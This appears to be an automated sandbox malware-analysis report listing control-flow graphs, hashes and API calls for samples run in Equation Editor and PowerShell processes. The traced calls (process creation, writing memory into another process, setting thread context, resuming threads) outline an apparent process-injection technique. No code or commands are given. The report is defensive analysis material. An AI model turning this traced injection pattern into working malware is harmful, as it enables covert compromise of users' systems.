                    • API String ID: 1124553745-0
                    • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                    • Instruction ID: 454c360330190842bebb6d1e6e7b7b129f92f5da8b3952be4974f2a7531bd970
                    • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                    • Instruction Fuzzy Hash: EE012699944B7221EB30F76848597E6AF10DBD2710F9E8446B8C008181D19480E38E6E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 52 36205ff-3620601 54 3620606-362060c 52->54 55 3620601 call 3620614 52->55 56 3620673-362067f 54->56 57 362060e-3620630 ShellExecuteW call 3620639 54->57 55->54 59 3620682 56->59 57->59 70 3620632 57->70 60 3620684-3620688 59->60 61 362068a-362068e 59->61 60->61 63 3620696-362069d 60->63 64 36206a3-36206a5 61->64 65 3620690-3620694 61->65 68 36206a1 63->68 69 362069f 63->69 67 36206b5-36206b6 64->67 65->63 65->64 72 36206a7-36206b0 68->72 69->64 70->64 71 3620634-362063e ExitProcess 70->71 75 36206b2 72->75 76 3620679-362067c 72->76 75->67 76->72 78 362067e 76->78 78->59
                    Memory Dump Source
                    • Source File: 00000002.00000002.463516205.0000000003620000.00000004.00000020.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3620000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                    • Instruction ID: e8628a64d6066e33052c49d84671385cda361c4daa711677d86335db3924a205
                    • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                    • Instruction Fuzzy Hash: 56014964548B3635F320F7240C89BDAAD80DBC2744FAE845AF49008081D29484638E6E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 79 3620557-3620559 LoadLibraryW call 3620571 81 362055e-3620563 79->81 82 36205d3-36205e4 81->82 83 3620565-362057c 81->83 85 3620582-36205d2 83->85 86 362057d call 36205e6 83->86 85->82 86->85
                    APIs
                    • LoadLibraryW.KERNEL32(03620549,?,036204C8,?,036204AC,?,03620492), ref: 03620557
                    Memory Dump Source
                    • Source File: 00000002.00000002.463516205.0000000003620000.00000004.00000020.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3620000_EQNEDT32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: b915eab49fa8b065187556425eda75321461bb595a18e0f437c65d650458762a
                    • Instruction ID: 1b13047fcdf7557d91b1f9210648476c38f6651b93e85af43d8a3aeb1094a526
                    • Opcode Fuzzy Hash: b915eab49fa8b065187556425eda75321461bb595a18e0f437c65d650458762a
                    • Instruction Fuzzy Hash: B51116A280D7D21FC723D7304E7A655BF652A2310475ECACFC0C21A9E3E6995142CB57

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 90 3620639-362063e ExitProcess
                    APIs
                    • ExitProcess.KERNEL32(00000000,?,0362062D,?,036204C8,?,036204AC,?,03620492), ref: 0362063E
                    Memory Dump Source
                    • Source File: 00000002.00000002.463516205.0000000003620000.00000004.00000020.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3620000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                    • Instruction ID: aa921bb992742b8518050018a2495b41bbcfba0e7d3d00f1a8d8c15699a4ad67
                    • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                    • Instruction Fuzzy Hash: D0D012712015029FD254DB54CD50F17F769FFC4611F14C258E5044B659C734D891CE94

                    Execution Graph

                    Execution Coverage:9.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:181
                    Total number of Limit Nodes:2
                    execution_graph 7532 2d59c0 7533 2d59e7 7532->7533 7534 2d5a31 7533->7534 7536 2d8455 7533->7536 7537 2d8465 7536->7537 7540 2d9939 7537->7540 7542 2d986d 7540->7542 7541 2d8567 7541->7533 7542->7540 7542->7541 7569 2da73d 7542->7569 7573 2d9fbd 7542->7573 7578 2da1a2 7542->7578 7586 2da2e1 7542->7586 7591 2da067 7542->7591 7596 2daaa4 7542->7596 7604 2da825 7542->7604 7608 2da7ec 7542->7608 7613 2d9bac 7542->7613 7618 2da9ac 7542->7618 7623 2d9f12 7542->7623 7627 2dadde 7542->7627 7634 2dad1c 7542->7634 7639 2da903 7542->7639 7644 2da186 7542->7644 7649 2da5c6 7542->7649 7657 2da885 7542->7657 7662 2da94f 7542->7662 7667 2da54d 7542->7667 7672 2da1f2 7542->7672 7680 2da233 7542->7680 7685 2da671 7542->7685 7690 2da0ba 7542->7690 7695 2dabfb 7542->7695 7700 2da77e 7542->7700 7705 2da4fc 7542->7705 7710 2db64f 7569->7710 7715 2db660 7569->7715 7570 2da755 7574 2d9ba2 7573->7574 7574->7573 7728 2d8fd8 7574->7728 7732 2d8fe0 7574->7732 7575 2dadb5 7575->7542 7579 2da1ac 7578->7579 7736 2db6a8 7579->7736 7741 2db698 7579->7741 7580 2d9ba2 7584 2d8fd8 WriteProcessMemory 7580->7584 7585 2d8fe0 WriteProcessMemory 7580->7585 7581 2dadb5 7581->7542 7584->7581 7585->7581 7587 2d9ba2 7586->7587 7589 2d8fd8 WriteProcessMemory 7587->7589 7590 2d8fe0 WriteProcessMemory 7587->7590 7588 2dadb5 7588->7542 7589->7588 7590->7588 7592 2dad8e 7591->7592 7594 2d8fd8 WriteProcessMemory 7592->7594 7595 2d8fe0 WriteProcessMemory 7592->7595 7593 2dadb5 7593->7542 7594->7593 7595->7593 7597 2da5ec 7596->7597 7598 2d9ba2 7596->7598 7602 2db6a8 2 API calls 7597->7602 7603 2db698 2 API calls 7597->7603 7600 2d8fd8 WriteProcessMemory 7598->7600 7601 2d8fe0 WriteProcessMemory 7598->7601 7599 2dadb5 7599->7542 7600->7599 7601->7599 7602->7598 7603->7598 7606 2d8fd8 WriteProcessMemory 7604->7606 7607 2d8fe0 WriteProcessMemory 7604->7607 7605 2da84f 7606->7605 7607->7605 7609 2d9ba2 7608->7609 7611 2d8fd8 WriteProcessMemory 7609->7611 7612 2d8fe0 WriteProcessMemory 7609->7612 7610 2dadb5 7610->7542 7611->7610 7612->7610 7614 2d9ba2 7613->7614 7616 2d8fd8 WriteProcessMemory 7614->7616 7617 2d8fe0 WriteProcessMemory 7614->7617 7615 2dadb5 7615->7542 7616->7615 7617->7615 7619 2d9ba2 7618->7619 7621 2d8fd8 WriteProcessMemory 7619->7621 7622 2d8fe0 WriteProcessMemory 7619->7622 7620 2dadb5 7620->7542 7621->7620 7622->7620 7625 2d8fd8 WriteProcessMemory 7623->7625 7626 2d8fe0 WriteProcessMemory 7623->7626 7624 2d9f46 7625->7624 7626->7624 7754 2d936c 7627->7754 7758 2d9378 7627->7758 7628 2d9ba2 7632 2d8fd8 WriteProcessMemory 7628->7632 7633 2d8fe0 WriteProcessMemory 7628->7633 7629 2dadb5 7629->7542 7632->7629 7633->7629 7635 2d9ba2 7634->7635 7637 2d8fd8 WriteProcessMemory 7635->7637 7638 2d8fe0 WriteProcessMemory 7635->7638 7636 2dadb5 7636->7542 7637->7636 7638->7636 7640 2d9ba2 7639->7640 7642 2d8fd8 WriteProcessMemory 7640->7642 7643 2d8fe0 WriteProcessMemory 7640->7643 7641 2dadb5 7641->7542 7642->7641 7643->7641 7645 2d9ba2 7644->7645 7647 2d8fd8 WriteProcessMemory 7645->7647 7648 2d8fe0 WriteProcessMemory 7645->7648 7646 2dadb5 7646->7542 7647->7646 7648->7646 7650 2da5d0 7649->7650 7655 2db6a8 2 API calls 7650->7655 7656 2db698 2 API calls 7650->7656 7651 2d9ba2 7653 2d8fd8 WriteProcessMemory 7651->7653 7654 2d8fe0 WriteProcessMemory 7651->7654 7652 2dadb5 7652->7542 7653->7652 7654->7652 7655->7651 7656->7651 7658 2d9ba2 7657->7658 7660 2d8fd8 WriteProcessMemory 7658->7660 7661 2d8fe0 WriteProcessMemory 7658->7661 7659 2dadb5 7659->7542 7660->7659 7661->7659 7663 2d9ba2 7662->7663 7665 2d8fd8 WriteProcessMemory 7663->7665 7666 2d8fe0 WriteProcessMemory 7663->7666 7664 2dadb5 7664->7542 7665->7664 7666->7664 7668 2d9ba2 7667->7668 7670 2d8fd8 WriteProcessMemory 7668->7670 7671 2d8fe0 WriteProcessMemory 7668->7671 7669 2dadb5 7669->7542 7670->7669 7671->7669 7673 2da1c8 7672->7673 7674 2d9ba2 7673->7674 7676 2db6a8 2 API calls 7673->7676 7677 2db698 2 API calls 7673->7677 7678 2d8fd8 WriteProcessMemory 7674->7678 7679 2d8fe0 WriteProcessMemory 7674->7679 7675 2dadb5 7675->7542 7676->7674 7677->7674 7678->7675 7679->7675 7681 2d9ba2 7680->7681 7683 2d8fd8 WriteProcessMemory 7681->7683 7684 2d8fe0 WriteProcessMemory 7681->7684 7682 2dadb5 7682->7542 7683->7682 7684->7682 7686 2d9ba2 7685->7686 7688 2d8fd8 WriteProcessMemory 7686->7688 7689 2d8fe0 WriteProcessMemory 7686->7689 7687 2dadb5 7687->7542 7688->7687 7689->7687 7691 2d9ba2 7690->7691 7691->7690 7693 2d8fd8 WriteProcessMemory 7691->7693 7694 2d8fe0 WriteProcessMemory 7691->7694 7692 2dadb5 7692->7542 7693->7692 7694->7692 7696 2d9ba2 7695->7696 7698 2d8fd8 WriteProcessMemory 7696->7698 7699 2d8fe0 WriteProcessMemory 7696->7699 7697 2dadb5 7697->7542 7698->7697 7699->7697 7701 2d9ba2 7700->7701 7703 2d8fd8 WriteProcessMemory 7701->7703 7704 2d8fe0 WriteProcessMemory 7701->7704 7702 2dadb5 7702->7542 7703->7702 7704->7702 7706 2d9ba2 7705->7706 7708 2d8fd8 WriteProcessMemory 7706->7708 7709 2d8fe0 WriteProcessMemory 7706->7709 7707 2dadb5 7707->7542 7708->7707 7709->7707 7711 2db675 7710->7711 7720 2d8d88 7711->7720 7724 2d8d80 7711->7724 7712 2db68b 7712->7570 7716 2db675 7715->7716 7718 2d8d88 Wow64SetThreadContext 7716->7718 7719 2d8d80 Wow64SetThreadContext 7716->7719 7717 2db68b 7717->7570 7718->7717 7719->7717 7721 2d8dd1 Wow64SetThreadContext 7720->7721 7723 2d8e4f 7721->7723 7723->7712 7725 2d8dd1 Wow64SetThreadContext 7724->7725 7727 2d8e4f 7725->7727 7727->7712 7729 2d902c WriteProcessMemory 7728->7729 7731 2d90cb 7729->7731 7731->7575 7733 2d902c WriteProcessMemory 7732->7733 7735 2d90cb 7733->7735 7735->7575 7737 2db6bd 7736->7737 7746 2d8c98 7737->7746 7750 2d8c91 7737->7750 7738 2db6d0 7738->7580 7742 2db6bd 7741->7742 7744 2d8c98 ResumeThread 7742->7744 7745 2d8c91 ResumeThread 7742->7745 7743 2db6d0 7743->7580 7744->7743 7745->7743 7747 2d8cdc ResumeThread 7746->7747 7749 2d8d2e 7747->7749 7749->7738 7751 2d8cdc ResumeThread 7750->7751 7753 2d8d2e 7751->7753 7753->7738 7755 2d9378 CreateProcessA 7754->7755 7757 2d9665 7755->7757 7759 2d93ff CreateProcessA 7758->7759 7761 2d9665 7759->7761

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 581268-58127a 1 58133a-5813b4 0->1 2 581280-581291 0->2 21 5813e1-5813e6 1->21 22 5813b6-5813c4 1->22 5 5812ab-5812c8 2->5 6 581293-581299 2->6 5->1 12 5812ca-5812ec 5->12 8 58129b 6->8 9 58129d-5812a9 6->9 8->5 9->5 16 5812ee-5812f4 12->16 17 581306-58131e 12->17 18 5812f8-581304 16->18 19 5812f6 16->19 24 58132c-581337 17->24 25 581320-581322 17->25 18->17 19->17 21->22 29 5813cc-5813db 22->29 25->24 29->21
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 89M$\9M$\9M
                    • API String ID: 0-341126351
                    • Opcode ID: e032703f9c51c0015affde3c4b72f54003f93ddcec3d6c31d66fde746033c7e8
                    • Instruction ID: a9842074c648f7d06d5f3968a50cc3de9d0cd458c02a1488c887139272c60b0e
                    • Opcode Fuzzy Hash: e032703f9c51c0015affde3c4b72f54003f93ddcec3d6c31d66fde746033c7e8
                    • Instruction Fuzzy Hash: 85411930B002549FDB10AB648825B7E7FE5FF85710F14855AE945EF382CB719D42C7A9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 48 5818e0-581903 49 581909-58190e 48->49 50 581a5a-581aa6 48->50 51 581910-581916 49->51 52 581926-58192a 49->52 60 581aac-581ab1 50->60 61 581c13-581c45 50->61 53 581918 51->53 54 58191a-581924 51->54 55 581930-581932 52->55 56 581a07-581a11 52->56 53->52 54->52 58 581942 55->58 59 581934-581940 55->59 62 581a1f-581a25 56->62 63 581a13-581a1c 56->63 65 581944-581946 58->65 59->65 66 581ac9-581acd 60->66 67 581ab3-581ab9 60->67 82 581c55 61->82 83 581c47-581c53 61->83 68 581a2b-581a37 62->68 69 581a27-581a29 62->69 65->56 73 58194c-581950 65->73 71 581bc2-581bcc 66->71 72 581ad3-581ad5 66->72 75 581abb 67->75 76 581abd-581ac7 67->76 70 581a39-581a57 68->70 69->70 84 581bda-581be0 71->84 85 581bce-581bd7 71->85 78 581ae5 72->78 79 581ad7-581ae3 72->79 80 581970 73->80 81 581952-58196e 73->81 75->66 76->66 88 581ae7-581ae9 78->88 79->88 86 581972-581974 80->86 81->86 90 581c57-581c59 82->90 83->90 91 581be2-581be4 84->91 92 581be6-581bf2 84->92 86->56 94 58197a-58198d 86->94 88->71 95 581aef-581af1 88->95 97 581c5b-581c61 90->97 98 581ca5-581caf 90->98 93 581bf4-581c10 91->93 92->93 118 581993-581995 94->118 100 581b01 95->100 101 581af3-581aff 95->101 105 581c6f-581c8c 97->105 106 581c63-581c65 97->106 103 581cba-581cc0 98->103 104 581cb1-581cb7 98->104 109 581b03-581b05 100->109 101->109 110 581cc2-581cc4 103->110 111 581cc6-581cd2 103->111 116 581c8e-581c9f 105->116 117 581cf2-581cf7 105->117 106->105 109->71 114 581b0b-581b0d 109->114 115 581cd4-581cef 110->115 111->115 120 581b0f-581b15 114->120 121 581b27-581b2b 114->121 116->98 117->116 125 5819ad-581a04 118->125 126 581997-58199d 118->126 127 581b19-581b25 120->127 128 581b17 120->128 123 581b2d-581b33 121->123 124 581b45-581bbf 121->124 130 581b35 123->130 131 581b37-581b43 123->131 133 58199f 126->133 134 5819a1-5819a3 126->134 127->121 128->121 130->124 131->124 133->125 134->125
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8#f$8#f
                    • API String ID: 0-3105900971
                    • Opcode ID: 0241f05bf39ac74805ee4e2330139896ee571153e8378d2be0f1de30e22f242d
                    • Instruction ID: f2f97916611149972312c4f82c3ef8ae797e85086fdcfbfad4722ce4d9fc6b4b
                    • Opcode Fuzzy Hash: 0241f05bf39ac74805ee4e2330139896ee571153e8378d2be0f1de30e22f242d
                    • Instruction Fuzzy Hash: 4FB12331B046418FDB24AE65C81076ABFEABFC1311F2484ABD849EB291DB71CD47C7A5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 165 2d936c-2d9411 168 2d945a-2d9482 165->168 169 2d9413-2d942a 165->169 172 2d94c8-2d951e 168->172 173 2d9484-2d9498 168->173 169->168 174 2d942c-2d9431 169->174 182 2d9564-2d9663 CreateProcessA 172->182 183 2d9520-2d9534 172->183 173->172 184 2d949a-2d949f 173->184 175 2d9454-2d9457 174->175 176 2d9433-2d943d 174->176 175->168 179 2d943f 176->179 180 2d9441-2d9450 176->180 179->180 180->180 181 2d9452 180->181 181->175 202 2d966c-2d9755 182->202 203 2d9665-2d966b 182->203 183->182 191 2d9536-2d953b 183->191 185 2d94a1-2d94ab 184->185 186 2d94c2-2d94c5 184->186 188 2d94ad 185->188 189 2d94af-2d94be 185->189 186->172 188->189 189->189 192 2d94c0 189->192 193 2d953d-2d9547 191->193 194 2d955e-2d9561 191->194 192->186 196 2d9549 193->196 197 2d954b-2d955a 193->197 194->182 196->197 197->197 199 2d955c 197->199 199->194 214 2d9765-2d9769 202->214 215 2d9757-2d975b 202->215 203->202 217 2d9779-2d977d 214->217 218 2d976b-2d976f 214->218 215->214 216 2d975d 215->216 216->214 219 2d978d-2d9791 217->219 220 2d977f-2d9783 217->220 218->217 221 2d9771 218->221 223 2d97c7-2d97d2 219->223 224 2d9793-2d97bc 219->224 220->219 222 2d9785 220->222 221->217 222->219 227 2d97d3 223->227 224->223 227->227
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002D9647
                    Memory Dump Source
                    • Source File: 00000006.00000002.473216277.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_2d0000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 9feb02a8735c3dc1c6289281f4eb8cdcc7e22abdd6c12be427f0323dccd3b69f
                    • Instruction ID: 8d1d91cbdc4eace1c56599c51700f017e84492b3346b3476601c2f9e8ea43d9d
                    • Opcode Fuzzy Hash: 9feb02a8735c3dc1c6289281f4eb8cdcc7e22abdd6c12be427f0323dccd3b69f
                    • Instruction Fuzzy Hash: 95C10470D102198FDF25CFA4C851BEEBBB1AF49300F0091AAE859B7290DB749E95CF85

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 229 2d9378-2d9411 231 2d945a-2d9482 229->231 232 2d9413-2d942a 229->232 235 2d94c8-2d951e 231->235 236 2d9484-2d9498 231->236 232->231 237 2d942c-2d9431 232->237 245 2d9564-2d9663 CreateProcessA 235->245 246 2d9520-2d9534 235->246 236->235 247 2d949a-2d949f 236->247 238 2d9454-2d9457 237->238 239 2d9433-2d943d 237->239 238->231 242 2d943f 239->242 243 2d9441-2d9450 239->243 242->243 243->243 244 2d9452 243->244 244->238 265 2d966c-2d9755 245->265 266 2d9665-2d966b 245->266 246->245 254 2d9536-2d953b 246->254 248 2d94a1-2d94ab 247->248 249 2d94c2-2d94c5 247->249 251 2d94ad 248->251 252 2d94af-2d94be 248->252 249->235 251->252 252->252 255 2d94c0 252->255 256 2d953d-2d9547 254->256 257 2d955e-2d9561 254->257 255->249 259 2d9549 256->259 260 2d954b-2d955a 256->260 257->245 259->260 260->260 262 2d955c 260->262 262->257 277 2d9765-2d9769 265->277 278 2d9757-2d975b 265->278 266->265 280 2d9779-2d977d 277->280 281 2d976b-2d976f 277->281 278->277 279 2d975d 278->279 279->277 282 2d978d-2d9791 280->282 283 2d977f-2d9783 280->283 281->280 284 2d9771 281->284 286 2d97c7-2d97d2 282->286 287 2d9793-2d97bc 282->287 283->282 285 2d9785 283->285 284->280 285->282 290 2d97d3 286->290 287->286 290->290
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002D9647
                    Memory Dump Source
                    • Source File: 00000006.00000002.473216277.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_2d0000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 6a1ac764cc9b4062b64e755e2d2f40febe0bb79c36efe9247caab66c294b6c9e
                    • Instruction ID: 2cba407ca474baf6fa95496eeb5e8c9a05305411c515497455bee5c5e03ddca9
                    • Opcode Fuzzy Hash: 6a1ac764cc9b4062b64e755e2d2f40febe0bb79c36efe9247caab66c294b6c9e
                    • Instruction Fuzzy Hash: 0DC11470D102298FDF25CFA4C851BEDBBB1AF49300F0091AAE859B7280DB749E95CF85

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 292 2d8fd8-2d904b 294 2d904d-2d905f 292->294 295 2d9062-2d90c9 WriteProcessMemory 292->295 294->295 297 2d90cb-2d90d1 295->297 298 2d90d2-2d9124 295->298 297->298
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002D90B3
                    Memory Dump Source
                    • Source File: 00000006.00000002.473216277.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_2d0000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: a9ededa83ed894d89709c88ef5ff1f90bf150d8de9058bd3be3e08909bdddd6c
                    • Instruction ID: 71c7022746b8597bef1b7cdba40f4d58b70a971e0b7ad0e08a51b647900f74a1
                    • Opcode Fuzzy Hash: a9ededa83ed894d89709c88ef5ff1f90bf150d8de9058bd3be3e08909bdddd6c
                    • Instruction Fuzzy Hash: C1419AB5D002599FCF00CFA9D984AEEBBF1AF49314F24902AE818B7250D375AA55CF64

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 303 2d8fe0-2d904b 305 2d904d-2d905f 303->305 306 2d9062-2d90c9 WriteProcessMemory 303->306 305->306 308 2d90cb-2d90d1 306->308 309 2d90d2-2d9124 306->309 308->309
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002D90B3
                    Memory Dump Source
                    • Source File: 00000006.00000002.473216277.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_2d0000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: cbe41d9ef84c1ac7fc4ac5995ba0bb180840a06ce64cc5893427b9e957fad687
                    • Instruction ID: bef73891f1f97d182d0758003d4c4b75c975b13bb70256f4ff9d8147237dc090
                    • Opcode Fuzzy Hash: cbe41d9ef84c1ac7fc4ac5995ba0bb180840a06ce64cc5893427b9e957fad687
                    • Instruction Fuzzy Hash: 0A41A8B5D002599FCF00CFA9D984AEEFBF1BB49314F20902AE818B7250D775AA55CF64

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 314 2d8d80-2d8de8 316 2d8dff-2d8e4d Wow64SetThreadContext 314->316 317 2d8dea-2d8dfc 314->317 319 2d8e4f-2d8e55 316->319 320 2d8e56-2d8ea2 316->320 317->316 319->320
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 002D8E37
                    Memory Dump Source
                    • Source File: 00000006.00000002.473216277.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_2d0000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 24db582cee7b29b9d2be460db44e23abf98b1cbd91ceb5f9233ecd483c5b5b03
                    • Instruction ID: 230dfbb1032bfc6742628e0774f61276d62612c80691a5d0ad455afc67702c35
                    • Opcode Fuzzy Hash: 24db582cee7b29b9d2be460db44e23abf98b1cbd91ceb5f9233ecd483c5b5b03
                    • Instruction Fuzzy Hash: 2041BFB4D102599FDB10CFA9D884AEEFBF1BF89314F24802AE414B7240C7749A46CF54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 325 2d8d88-2d8de8 327 2d8dff-2d8e4d Wow64SetThreadContext 325->327 328 2d8dea-2d8dfc 325->328 330 2d8e4f-2d8e55 327->330 331 2d8e56-2d8ea2 327->331 328->327 330->331
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 002D8E37
                    Memory Dump Source
                    • Source File: 00000006.00000002.473216277.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_2d0000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: ea17b6115abc772c5f132fb0b2092d6b6a95f561afb7d0f11fdcefdd1cf4294a
                    • Instruction ID: 616c13e2e49c30a12e5c9c4f37dcbfb0005a821bac52a10d9d81de0432e692aa
                    • Opcode Fuzzy Hash: ea17b6115abc772c5f132fb0b2092d6b6a95f561afb7d0f11fdcefdd1cf4294a
                    • Instruction Fuzzy Hash: F541ACB5D102599FDB14CFA9D884AEEFBF1BF89314F24802AE418B7240D778AA45CF54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 336 2d8c91-2d8d2c ResumeThread 339 2d8d2e-2d8d34 336->339 340 2d8d35-2d8d77 336->340 339->340
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 002D8D16
                    Memory Dump Source
                    • Source File: 00000006.00000002.473216277.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_2d0000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 86b6d14e3bb034cd96abae9a675978ae88098b35abc2c78a68c5d73e90004bee
                    • Instruction ID: 61a00cc34451ddcf66118c422df46d47b5a5f6d1e68c9bf4de150010f8ccb812
                    • Opcode Fuzzy Hash: 86b6d14e3bb034cd96abae9a675978ae88098b35abc2c78a68c5d73e90004bee
                    • Instruction Fuzzy Hash: A631DBB4D002489FCF10CFA9D984AEEFBB1AF89314F20841AE815B7350C775A906CF94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 345 2d8c98-2d8d2c ResumeThread 348 2d8d2e-2d8d34 345->348 349 2d8d35-2d8d77 345->349 348->349
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 002D8D16
                    Memory Dump Source
                    • Source File: 00000006.00000002.473216277.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_2d0000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: f3bf6b63893936a11e2f9b1b69bdca01c2a49efc7a1de1edee02977822146856
                    • Instruction ID: 203f9c325ea84334f8a61c188e05a26def6f8597b4cad5b90e00da9757b58d52
                    • Opcode Fuzzy Hash: f3bf6b63893936a11e2f9b1b69bdca01c2a49efc7a1de1edee02977822146856
                    • Instruction Fuzzy Hash: D231BBB4D102199FCF14CFA9D984AEEFBB5AF89314F20941AE814B7340C775A905CF94
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f99a61a8de8e2babede179f4bf8ef70f0e1ea69ce75977173c68d38e06c09e83
                    • Instruction ID: e5268f4220880c10a9948a12343454691bcabd891a51d54b2fa00dcf44574dcf
                    • Opcode Fuzzy Hash: f99a61a8de8e2babede179f4bf8ef70f0e1ea69ce75977173c68d38e06c09e83
                    • Instruction Fuzzy Hash: 5FB116307042059FDBA5AF64C810B7ABBA6BFC5310F24846AD849EB3D2DB31DD46CB61
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5babf44cd703eb7b570d2ff9fd14234a539d27de9fefb39841f41ab5a7d125cb
                    • Instruction ID: 75a90cd347385322e549fa216ce43742ffcba8f44558a593fe59ce41cc0019a6
                    • Opcode Fuzzy Hash: 5babf44cd703eb7b570d2ff9fd14234a539d27de9fefb39841f41ab5a7d125cb
                    • Instruction Fuzzy Hash: C2312830A00305DFDFA4BE64C51167ABFA0BF41311F15916ADC04AB2D2D775CD89C762
                    Memory Dump Source
                    • Source File: 00000006.00000002.473183199.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_12d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 59542a2c3eb933a36c8b584b9b4e75dd8fa431360fbffc737f4e06b4e8087249
